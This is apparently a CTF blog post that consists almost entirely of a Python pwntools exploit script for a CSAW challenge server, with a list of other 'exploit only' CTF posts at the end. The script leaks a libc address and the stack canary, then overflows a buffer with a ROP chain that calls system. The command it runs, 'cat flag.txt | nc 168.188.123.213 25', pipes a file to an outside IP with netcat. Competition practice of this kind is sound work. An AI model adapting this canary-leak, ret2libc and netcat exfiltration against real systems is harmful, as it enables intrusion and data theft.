from pwn import *
#nc pwn.chal.csaw.io 8002
conn = remote('pwn.chal.csaw.io', 8002)
payload ="1\n"
conn.send(payload)
print conn.recvuntil(">Reference:0x")
puts_addr = int(conn.recv(12), 16) + 1280
print "puts_addr : " + hex(puts_addr)
payload = "2\n"
conn.send(payload)
payload = "A" * 310
payload += "Z"
payload += "\n"
conn.send(payload)
print conn.recvuntil("Z\n")
canary = u64(conn.recv(8))
print "canary : " + hex(canary)
puts_offset = 0x000000000006FD60
system_offset = 0x0000000000046590
puts_system = puts_offset - system_offset
system_addr = puts_addr - puts_system
read_plt = 0x0000000000400B60
wrtie_plt = 0x0000000000400AE0
poprdiret = 0x004012e3
poprsir15ret = 0x004012e1
bss = 0x00000000006020F8
cmd = "cat flag.txt | nc 168.188.123.213 25;"
payload = "2\n"
conn.send(payload)
payload = "A" * 312
payload += p64(canary)
payload += "BBBBBBBB"
#payload += p64(poprdiret)
#payload += p64(4)
#payload += p64(0x0000000000400EF2)
payload += p64(poprdiret)
payload += p64(4)
payload += p64(poprsir15ret)
payload += p64(bss)
payload += "AAAAAAAA"
payload += p64(read_plt)
#payload += p64(poprdiret)
#payload += p64(4)
#payload += p64(0x0000000000400EF2)
payload += p64(poprdiret)
payload += p64(bss)
payload += p64(system_addr)
payload += "CCCCCCCC"
conn.send(payload + "\n")
sleep(0.3)
conn.send(cmd + "\n")
print conn.recv(1024)
print conn.recv(1024)
print conn.recv(1024)
print conn.recv(1024)
print conn.recv(1024)
print conn.recv(1024)
'CTF' 카테고리의 다른 글
| 2017 DEFCON mute 풀이 (0) | 2017.05.01 |
|---|---|
| 2016 Layer7 CTF easy_fsb exploit only (0) | 2016.09.06 |
| 2016 Layer7 CTF easy_bof exploit only (0) | 2016.09.06 |
| codegate 2013 vuln200 from rop exploit only (0) | 2016.09.04 |
| angry_doraemon exploit only from pwntools (0) | 2016.08.28 |